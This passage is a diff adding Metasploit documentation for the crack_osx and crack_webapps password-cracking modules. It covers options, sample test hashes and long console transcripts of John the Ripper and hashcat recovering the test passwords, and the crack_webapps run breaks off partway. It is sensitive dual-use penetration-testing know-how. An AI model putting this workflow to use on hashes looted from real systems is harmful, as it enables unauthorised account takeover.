+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+   **XSHA**
+
+   Crack xsha based hashes. Default is `true`.
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+creds add user:buddahh hash:7E4F6138BE21EF6A61365A4D3270DAD24A6544EE188ED422 jtr:xsha
+creds add user:mama hash:3063D72395EB1A92D9BA9B8C2DF4074A081EDD1954E6B2BA jtr:xsha
+creds add user:hashcat hash:1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683 jtr:xsha
+creds add user:hashcat hash:$ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f9$
+echo "" > /root/.msf4/john.pot
+echo "3063D72395EB1A92D9BA9B8C2DF4074A081EDD1954E6B2BA:mama" >> /root/.msf4/john.pot
+echo "md5be86a79bf20fake2d58d5453c47d4860:password" >> /root/.msf4/john.pot
+echo "password" > /tmp/wordlist
+echo "buddahh" >> /tmp/wordlist
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_osx
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-30487-6zp8aw
+[*] Wordlist file written out to /tmp/jtrtmp20190531-30487-7w6deh
+[*] Checking xsha hashes already cracked...
+[*] Cracking xsha hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=u7NpglLW --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+Warning: poor OpenMP scalability for this hash type, consider --fork=8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 16:03) 100.0g/s 819200p/s 819200c/s 819200C/s test3:::..Password1\!99
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking xsha hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=u7NpglLW --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking xsha hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=u7NpglLW --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking xsha hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=u7NpglLW --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1398   xsha       xsha_buddahh  buddahh           Single
+ 1399   xsha       xsha_mama     mama              Already Cracked/POT
+
+[*] Checking xsha512 hashes already cracked...
+[*] Cracking xsha512 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=A5BIrZX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha512 --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 16:03) 66.66g/s 568866p/s 1137Kc/s 1137KC/s test3:::..t1900
+Use the "--show --format=xsha512" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking xsha512 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=A5BIrZX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha512 --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking xsha512 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=A5BIrZX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha512 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking xsha512 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=A5BIrZX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=xsha512 --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1398   xsha       xsha_buddahh      buddahh           Single
+ 1399   xsha       xsha_mama         mama              Already Cracked/POT
+ 1401   xsha512    xsha512_password  password          Single
+ 1402   xsha512    xsha512_hashcat   hashcat           Single
+
+[*] Checking PBKDF2-HMAC-SHA512 hashes already cracked...
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=BdToxfX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA512 --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 16:03) 9.090g/s 290.9p/s 290.9c/s 290.9C/s test3:::..Thales
+Use the "--show --format=PBKDF2-HMAC-SHA512" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=BdToxfX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA512 --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=BdToxfX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA512 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=BdToxfX9 --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA512 --wordlist=/tmp/jtrtmp20190531-30487-7w6deh --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-30487-6zp8aw
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type           Username          Cracked Password  Method
+ -----  ---------           --------          ----------------  ------
+ 1398   xsha                xsha_buddahh      buddahh           Single
+ 1399   xsha                xsha_mama         mama              Already Cracked/POT
+ 1401   xsha512             xsha512_password  password          Single
+ 1402   xsha512             xsha512_hashcat   hashcat           Single
+ 1403   PBKDF2-HMAC-SHA512  pbkdf2_hashcat    hashcat           Single
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public            private                                                                                                                                                                                                      realm  private_type        JtR Format
+----  ------  -------  ------            -------                                                                                                                                                                                                      -----  ------------        ----------
+                       xsha_buddahh      7E4F6138BE21EF6A61365A4D3270DAD24A6544EE188ED422                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha_mama         3063D72395EB1A92D9BA9B8C2DF4074A081EDD1954E6B2BA                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha_hashcat      1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha512_password  229499e73f6ff50fbd76fa1a0b11fe10964b51b57ee0bc7ca29a5fdccaf264e132eb682abeb40a3513a1fe26397ddcd1b5d0161e5e3ff308377994f4bed4172efcc25f8a                                                                            Nonreplayable hash  xsha512
+                       xsha512_hashcat   648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d                                                                            Nonreplayable hash  xsha512
+                       pbkdf2_hashcat    $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222         Nonreplayable hash  PBKDF2-HMAC-SHA512
+                       xsha_mama         mama                                                                                                                                                                                                                Password            
+                       xsha_buddahh      buddahh                                                                                                                                                                                                             Password            
+                       xsha512_password  password                                                                                                                                                                                                            Password            
+                       xsha512_hashcat   hashcat                                                                                                                                                                                                             Password            
+                       pbkdf2_hashcat    hashcat                                                                                                                                                                                                             Password            
+
+[*] Starting persistent handler(s)...
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_osx
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-31439-ulynqs
+[*] Wordlist file written out to /tmp/jtrtmp20190531-31439-1bcms0z
+[*] Checking xsha hashes already cracked...
+[*] Cracking xsha hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=YpmTr019 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=122 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking xsha hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=YpmTr019 --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=122 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs /tmp/jtrtmp20190531-31439-1bcms0z
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username      Cracked Password  Method
+ -----  ---------  --------      ----------------  ------
+ 1421   xsha       xsha_buddahh  buddahh           Wordlist
+ 1422   xsha       xsha_mama     mama              Already Cracked/POT
+ 1423   xsha       xsha_hashcat  hashcat           Wordlist
+
+[*] Checking xsha512 hashes already cracked...
+[*] Cracking xsha512 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=HNDjhJcJ --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1722 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking xsha512 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=HNDjhJcJ --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1722 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs /tmp/jtrtmp20190531-31439-1bcms0z
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1421   xsha       xsha_buddahh      buddahh           Wordlist
+ 1422   xsha       xsha_mama         mama              Already Cracked/POT
+ 1423   xsha       xsha_hashcat      hashcat           Wordlist
+ 1424   xsha512    xsha512_password  password          Wordlist
+ 1425   xsha512    xsha512_hashcat   hashcat           Wordlist
+
+[*] Checking PBKDF2-HMAC-SHA512 hashes already cracked...
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=Tnilqjei --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=7100 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=Tnilqjei --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=7100 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs /tmp/jtrtmp20190531-31439-1bcms0z
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type           Username          Cracked Password  Method
+ -----  ---------           --------          ----------------  ------
+ 1421   xsha                xsha_buddahh      buddahh           Wordlist
+ 1422   xsha                xsha_mama         mama              Already Cracked/POT
+ 1423   xsha                xsha_hashcat      hashcat           Wordlist
+ 1424   xsha512             xsha512_password  password          Wordlist
+ 1425   xsha512             xsha512_hashcat   hashcat           Wordlist
+ 1426   PBKDF2-HMAC-SHA512  pbkdf2_hashcat    hashcat           Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public            private                                                                                                                                                                                                      realm  private_type        JtR Format
+----  ------  -------  ------            -------                                                                                                                                                                                                      -----  ------------        ----------
+                       xsha_buddahh      7E4F6138BE21EF6A61365A4D3270DAD24A6544EE188ED422                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha_mama         3063D72395EB1A92D9BA9B8C2DF4074A081EDD1954E6B2BA                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha_hashcat      1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha512_password  229499e73f6ff50fbd76fa1a0b11fe10964b51b57ee0bc7ca29a5fdccaf264e132eb682abeb40a3513a1fe26397ddcd1b5d0161e5e3ff308377994f4bed4172efcc25f8a                                                                            Nonreplayable hash  xsha512
+                       xsha512_hashcat   648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d                                                                            Nonreplayable hash  xsha512
+                       pbkdf2_hashcat    $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222         Nonreplayable hash  PBKDF2-HMAC-SHA512
+                       xsha_mama         mama                                                                                                                                                                                                                Password            
+                       xsha_hashcat      hashcat                                                                                                                                                                                                             Password            
+                       xsha_buddahh      buddahh                                                                                                                                                                                                             Password            
+                       xsha512_hashcat   hashcat                                                                                                                                                                                                             Password            
+                       xsha512_password  password                                                                                                                                                                                                            Password            
+                       pbkdf2_hashcat    hashcat                                                                                                                                                                                                             Password
+```

documentation/modules/auxiliary/analyze/crack_webapps.md

@@ -0,0 +1,417 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode Webapps
+  based password hashes, such as:
+
+  * `atlassian` based passwords
+  * `phpass` based passwords (wordpress, joomla, phpBB3)
+  * `mediawiki` based passwords
+
+| Common    | John             | Hashcat |
+|-----------|------------------|-------- |
+| atlassian | PBKDF2-HMAC-SHA1 | 12001   |
+| mediawiki | mediawiki        | 3711    |
+| phpass    | phpass           | 400     |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `atlassian`, `mediawiki`, or `phpass` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_webapps```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **ATLASSIAN**
+
+   Crack atlassian hashes. Default is `true`.
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MEDIAWIKI**
+
+   Crack mediawiki hashes. Default is `true`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **PHPASS**
+
+   Crack PHPASS hashes. Default is `true`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+echo "" > /root/.msf4/john.pot
+echo "fakeV6xlcXxRM:55" >> /root/.msf4/john.pot
+echo "\$1\$O3JMY.Tw\$AdLnLjQ/5jXF9.fakegHv/:password" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+echo "toto" >> /tmp/wordlist
+echo "hashcat" >> /tmp/wordlist
+creds add user:mediawiki_qwerty hash:$B$113$de2874e33da25313d808d2a8cbf31485 jtr:mediawiki
+creds add user:mediawiki_hashcat hash:$B$56668501$0ce106caa70af57fd525aeaf80ef2898 jtr:mediawiki
+creds add user:phpass_p_hashcat hash:$P$984478476IagS59wHZvyQMArzfx58u. jtr:phpass
+creds add user:phpass_h_hashcat hash:$H$984478476IagS59wHZvyQMArzfx58u. jtr:phpass
+creds add user:atlassian_hashcat hash:{PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa jtr:PBKDF2-HMAC-SHA1
+creds add user:atlassian_secret hash:{PKCS5S2}/eWKocWoBMiEN6aA2SQMm56/qLdCVW0fmGF4zF3CzeyaoZUpW1tE3R/fxnYjGbza jtr:PBKDF2-HMAC-SHA1
+creds add user:atlassian_admin hash:{PKCS5S2}8WEZjkCbLWysbcbZ5PRgMbdJgJOhkzRT3y1jxOqke2z1Zr79q8ypugFQEYaMoIZt jtr:PBKDF2-HMAC-SHA1
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_webapps
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-3775-yc870y
+[*] Wordlist file written out to /tmp/jtrtmp20190531-3775-5tikjk
+[*] Checking PBKDF2-HMAC-SHA1 hashes already cracked...
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=UEKq1EAc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA1 --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:03 DONE (2019-05-31 18:59) 0.2564g/s 4375p/s 8883c/s 8883C/s password11908..t1900
+Use the "--show --format=PBKDF2-HMAC-SHA1" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=UEKq1EAc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA1 --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE 1/3 (2019-05-31 18:59) 50.00g/s 3175p/s 3200c/s 3200C/s atlassian_admin..Atlassianatlassian
+Use the "--show --format=PBKDF2-HMAC-SHA1" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=UEKq1EAc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA1 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=UEKq1EAc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA1 --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1535   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Single
+ 1536   PBKDF2-HMAC-SHA1  atlassian_secret   secret            Normal
+ 1537   PBKDF2-HMAC-SHA1  atlassian_admin    admin             Normal
+
+[*] Checking phpass hashes already cracked...
+[*] Cracking phpass hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=ELA5O5SC --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=phpass --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 18:59) 100.0g/s 38400p/s 38400c/s 76800C/s test3:::..tere9
+Use the "--show --format=phpass" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking phpass hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=ELA5O5SC --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=phpass --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE 1/3 (2019-05-31 18:59) 100.0g/s 19200p/s 19200c/s 19200C/s phpass_p_hashcat..tachsah_p_ssaphptachsaH
+Use the "--show --format=phpass" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking phpass hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=ELA5O5SC --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=phpass --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[*] Cracking phpass hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=ELA5O5SC --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=phpass --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1533   phpass            phpass_p_hashcat   hashcat           Normal
+ 1534   phpass            phpass_h_hashcat   hashcat           Single
+ 1535   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Single
+ 1536   PBKDF2-HMAC-SHA1  atlassian_secret   secret            Normal
+ 1537   PBKDF2-HMAC-SHA1  atlassian_admin    admin             Normal
+
+[*] Checking mediawiki hashes already cracked...
+[*] Cracking mediawiki hashes in single mode...
